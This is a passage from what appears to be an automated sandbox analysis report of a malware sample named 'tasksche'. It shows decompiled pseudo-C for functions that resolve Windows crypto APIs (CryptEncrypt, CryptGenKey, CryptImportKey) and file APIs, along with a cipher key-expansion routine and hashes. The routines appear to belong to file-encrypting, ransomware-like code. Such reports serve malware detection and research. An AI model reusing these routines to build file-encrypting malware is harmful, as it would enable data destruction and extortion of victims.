				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                                                                                                                                                0x0040379f
                                                                                                                                                0x004037a6
                                                                                                                                                0x004037b0
                                                                                                                                                0x004037b9
                                                                                                                                                0x004037be
                                                                                                                                                0x004037bf
                                                                                                                                                0x004037bf
                                                                                                                                                0x004037c4
                                                                                                                                                0x004037cd
                                                                                                                                                0x00000000
                                                                                                                                                0x004037d7
                                                                                                                                                0x004037e3
                                                                                                                                                0x004037e4
                                                                                                                                                0x004037e5
                                                                                                                                                0x004037e7
                                                                                                                                                0x004037f6
                                                                                                                                                0x004037fa
                                                                                                                                                0x00403805
                                                                                                                                                0x00403814
                                                                                                                                                0x00403817
                                                                                                                                                0x0040381a
                                                                                                                                                0x00403820
                                                                                                                                                0x00403828
                                                                                                                                                0x0040382b
                                                                                                                                                0x0040382e
                                                                                                                                                0x00403831
                                                                                                                                                0x00403837
                                                                                                                                                0x00403838
                                                                                                                                                0x00403840
                                                                                                                                                0x00403849
                                                                                                                                                0x0040384a
                                                                                                                                                0x0040384f
                                                                                                                                                0x00403854
                                                                                                                                                0x00403858
                                                                                                                                                0x0040385b
                                                                                                                                                0x0040385e
                                                                                                                                                0x00403860
                                                                                                                                                0x00403860
                                                                                                                                                0x00403860
                                                                                                                                                0x00403831
                                                                                                                                                0x00403867
                                                                                                                                                0x0040386e
                                                                                                                                                0x00403871
                                                                                                                                                0x0040387d
                                                                                                                                                0x00403880
                                                                                                                                                0x00403882
                                                                                                                                                0x0040388b
                                                                                                                                                0x0040388e
                                                                                                                                                0x00403896
                                                                                                                                                0x00403899
                                                                                                                                                0x004038a1
                                                                                                                                                0x004038a7
                                                                                                                                                0x004038aa
                                                                                                                                                0x004038ad
                                                                                                                                                0x004038b5
                                                                                                                                                0x004038c8
                                                                                                                                                0x004038cb
                                                                                                                                                0x004038ee
                                                                                                                                                0x00403910
                                                                                                                                                0x00403916
                                                                                                                                                0x00403918
                                                                                                                                                0x0040391b
                                                                                                                                                0x0040391e
                                                                                                                                                0x0040391e
                                                                                                                                                0x0040391e
                                                                                                                                                0x004038ad
                                                                                                                                                0x00403937
                                                                                                                                                0x0040393c
                                                                                                                                                0x00403940
                                                                                                                                                0x00403943
                                                                                                                                                0x00403946
                                                                                                                                                0x00403949
                                                                                                                                                0x00403880
                                                                                                                                                0x00403955
                                                                                                                                                0x0040395b
                                                                                                                                                0x00403961
                                                                                                                                                0x00403964
                                                                                                                                                0x0040396d
                                                                                                                                                0x00403975
                                                                                                                                                0x0040397d
                                                                                                                                                0x00403980
                                                                                                                                                0x0040398f
                                                                                                                                                0x0040399a
                                                                                                                                                0x004039b0
                                                                                                                                                0x004039b7
                                                                                                                                                0x004039b8
                                                                                                                                                0x004039d2
                                                                                                                                                0x004039d6
                                                                                                                                                0x004039db
                                                                                                                                                0x004039f1
                                                                                                                                                0x004039f8
                                                                                                                                                0x004039f9
                                                                                                                                                0x00403a0e
                                                                                                                                                0x00403a11
                                                                                                                                                0x00403a13
                                                                                                                                                0x00403a14
                                                                                                                                                0x00403a17
                                                                                                                                                0x00403a18
                                                                                                                                                0x00403980
                                                                                                                                                0x00403a25

                                                                                                                                                APIs
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                                                                                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2382887404-3916222277
                                                                                                                                                • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                                                                                                                • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                                                                                                                                                • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                                                                                                                • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}









                                                                                                                                                0x004029ce
                                                                                                                                                0x004029d6
                                                                                                                                                0x004029db
                                                                                                                                                0x004029df
                                                                                                                                                0x004029ea
                                                                                                                                                0x004029ea
                                                                                                                                                0x004029ef
                                                                                                                                                0x00402a1d
                                                                                                                                                0x00402a1d
                                                                                                                                                0x00402a22
                                                                                                                                                0x00402a2e
                                                                                                                                                0x00402a31
                                                                                                                                                0x00000000
                                                                                                                                                0x004029f1
                                                                                                                                                0x004029f2
                                                                                                                                                0x004029f7
                                                                                                                                                0x00402a12
                                                                                                                                                0x00402a15
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004029f9
                                                                                                                                                0x004029f9
                                                                                                                                                0x004029fc
                                                                                                                                                0x00402a01
                                                                                                                                                0x00402a07
                                                                                                                                                0x00402a0b
                                                                                                                                                0x00402a0c
                                                                                                                                                0x00402a0d
                                                                                                                                                0x00000000
                                                                                                                                                0x004029f9
                                                                                                                                                0x004029ef
                                                                                                                                                0x00402a45

                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$FreeProcessfree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3428986607-0
                                                                                                                                                • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                                                                                • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                                                                                                                                                • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                                                                                                                • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25encryptionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 16%
                                                                                                                                                			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}








                                                                                                                                                0x004018ba
                                                                                                                                                0x004018bc
                                                                                                                                                0x004018c1
                                                                                                                                                0x004018c4
                                                                                                                                                0x004018ca
                                                                                                                                                0x004018ca
                                                                                                                                                0x004018ce
                                                                                                                                                0x004018d3
                                                                                                                                                0x004018d6
                                                                                                                                                0x004018dc
                                                                                                                                                0x004018dc
                                                                                                                                                0x004018e0
                                                                                                                                                0x004018e5
                                                                                                                                                0x004018ea
                                                                                                                                                0x004018f0
                                                                                                                                                0x004018f0
                                                                                                                                                0x004018f6
                                                                                                                                                0x004018f8

                                                                                                                                                APIs
                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextCryptRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 829835001-0
                                                                                                                                                • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                                                                                • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                                                                                                                                                • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                                                                                                                • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}













                                                                                                                                                0x00401713
                                                                                                                                                0x004017d8
                                                                                                                                                0x00000000
                                                                                                                                                0x004017d8
                                                                                                                                                0x0040171b
                                                                                                                                                0x00401721
                                                                                                                                                0x004017d3
                                                                                                                                                0x004017d5
                                                                                                                                                0x00000000
                                                                                                                                                0x004017d5
                                                                                                                                                0x00401732
                                                                                                                                                0x00401736
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401751
                                                                                                                                                0x0040175e
                                                                                                                                                0x0040176b
                                                                                                                                                0x00401778
                                                                                                                                                0x00401785
                                                                                                                                                0x00401792
                                                                                                                                                0x00401797
                                                                                                                                                0x00401799
                                                                                                                                                0x0040179f
                                                                                                                                                0x004017a5
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004017a7
                                                                                                                                                0x004017ad
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004017af
                                                                                                                                                0x004017b5
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004017b7
                                                                                                                                                0x004017bd
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004017bf
                                                                                                                                                0x004017c5
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004017c7
                                                                                                                                                0x004017cd
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                                                                                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                                                                                                                • API String ID: 2238633743-1294736154
                                                                                                                                                • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                                                                                • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                                                                                                                                                • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                                                                                                                • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}












                                                                                                                                                0x00401a48
                                                                                                                                                0x00401a4f
                                                                                                                                                0x00401aec
                                                                                                                                                0x00401aee
                                                                                                                                                0x00000000
                                                                                                                                                0x00401aee
                                                                                                                                                0x00401a60
                                                                                                                                                0x00401a64
                                                                                                                                                0x00401af1
                                                                                                                                                0x00000000
                                                                                                                                                0x00401af1
                                                                                                                                                0x00401a7f
                                                                                                                                                0x00401a8c
                                                                                                                                                0x00401a99
                                                                                                                                                0x00401aa6
                                                                                                                                                0x00401ab3
                                                                                                                                                0x00401ab8
                                                                                                                                                0x00401aba
                                                                                                                                                0x00401ac0
                                                                                                                                                0x00401ac6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401ac8
                                                                                                                                                0x00401ace
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401ad0
                                                                                                                                                0x00401ad6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401ad8
                                                                                                                                                0x00401ade
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401ae0
                                                                                                                                                0x00401ae6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                                                                                                                • API String ID: 2238633743-2459060434
                                                                                                                                                • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                                                                                • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                                                                                                                                                • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                                                                                                                • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
